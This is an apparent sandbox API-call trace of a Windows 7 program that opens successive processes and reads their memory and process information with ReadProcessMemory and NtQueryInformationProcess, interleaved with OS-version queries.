[0412.949] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.951] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.951] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.951] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x241ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.952] malloc (_Size=0x62) returned 0x2c0790
[0412.952] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x24273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0412.952] free (_Block=0x2c0790)
[0412.953] CloseHandle (hObject=0x24c) returned 1
[0412.955] _ui64tow (_Value=0xbec, _Buffer="3044", _Radix=10) returned="3052"
[0412.961] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3052") returned 4
[0412.962] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.962] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.986] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x24c
[0412.986] GetLastError () returned 0x0
[0412.986] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.986] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.987] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.987] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4328c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.987] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4326de, lpBuffer=0x12dd100, nSize=0x4c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.988] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.988] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.988] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.989] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.989] malloc (_Size=0x54) returned 0x2b9ad0
[0412.989] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x43272a, lpBuffer=0x2b9ad0, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b9ad0*, lpNumberOfBytesRead=0x0) returned 1
[0412.989] free (_Block=0x2b9ad0)
[0412.989] CloseHandle (hObject=0x24c) returned 1
[0412.990] _ui64tow (_Value=0xbf4, _Buffer="3052", _Radix=10) returned="3060"
[0412.993] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3060") returned 4
[0412.994] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.994] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x24c
[0413.012] GetLastError () returned 0x0
[0413.012] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.012] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.012] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.012] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6228d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.013] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6226da, lpBuffer=0x12dd100, nSize=0x54, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.013] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.014] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.014] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.014] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.015] malloc (_Size=0x5c) returned 0x2c0790
[0413.015] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x62272e, lpBuffer=0x2c0790, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.015] free (_Block=0x2c0790)
[0413.016] CloseHandle (hObject=0x24c) returned 1
[0413.016] _ui64tow (_Value=0xbfc, _Buffer="3060", _Radix=10) returned="3068"
[0413.020] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3068") returned 4
[0413.021] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.021] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.042] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x24c
[0413.042] GetLastError () returned 0x0
[0413.042] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.042] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d28d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d26de, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.044] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.045] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.045] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.045] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.046] malloc (_Size=0x5e) returned 0x2c0720
[0413.046] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3d2734, lpBuffer=0x2c0720, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0413.046] free (_Block=0x2c0720)
[0413.047] CloseHandle (hObject=0x24c) returned 1
[0413.047] _ui64tow (_Value=0x304, _Buffer="3068", _Radix=10) returned="772"
[0413.052] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="772") returned 3
[0413.053] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.053] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.079] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x24c
[0413.079] GetLastError () returned 0x0
[0413.080] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x826de, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.081] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.082] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.083] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.083] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x81ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.083] malloc (_Size=0x58) returned 0x2b99b0
[0413.083] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x8272e, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0413.083] free (_Block=0x2b99b0)
[0413.084] CloseHandle (hObject=0x24c) returned 1
[0413.085] _ui64tow (_Value=0x310, _Buffer="772", _Radix=10) returned="784"
[0413.090] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="784") returned 3
[0413.091] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.091] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.113] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x310) returned 0x24c
[0413.113] GetLastError () returned 0x0
[0413.113] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.113] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.114] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.114] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.114] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6226f6, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.115] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.117] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.117] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.117] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.117] malloc (_Size=0x82) returned 0x2e3b90
[0413.117] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622770, lpBuffer=0x2e3b90, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0413.117] free (_Block=0x2e3b90)
[0413.118] CloseHandle (hObject=0x24c) returned 1
[0413.119] _ui64tow (_Value=0x754, _Buffer="784", _Radix=10) returned="1876"
[0413.124] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1876") returned 4
[0413.125] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.125] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.147] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x24c
[0413.147] GetLastError () returned 0x0
[0413.147] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6128f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6126d8, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.149] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.150] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.150] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.150] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x611ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.151] malloc (_Size=0x68) returned 0x2c0800
[0413.151] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x612738, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0413.151] free (_Block=0x2c0800)
[0413.152] CloseHandle (hObject=0x24c) returned 1
[0413.152] _ui64tow (_Value=0x444, _Buffer="1876", _Radix=10) returned="1092"
[0413.157] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1092") returned 4
[0413.158] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.158] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.185] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x24c
[0413.185] GetLastError () returned 0x0
[0413.185] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.185] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.185] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.186] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d2880, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.186] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d26ce, lpBuffer=0x12dd100, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.187] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.188] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.188] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.188] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.189] malloc (_Size=0x44) returned 0x2bd2c0
[0413.189] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5d270a, lpBuffer=0x2bd2c0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd2c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.189] free (_Block=0x2bd2c0)
[0413.190] CloseHandle (hObject=0x24c) returned 1
[0413.191] _ui64tow (_Value=0x828, _Buffer="1092", _Radix=10) returned="2088"
[0413.196] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2088") returned 4
[0413.197] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.197] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.220] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x828) returned 0x24c
[0413.220] GetLastError () returned 0x0
[0413.220] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.220] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.221] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.221] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2628e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.221] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2626e0, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.222] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
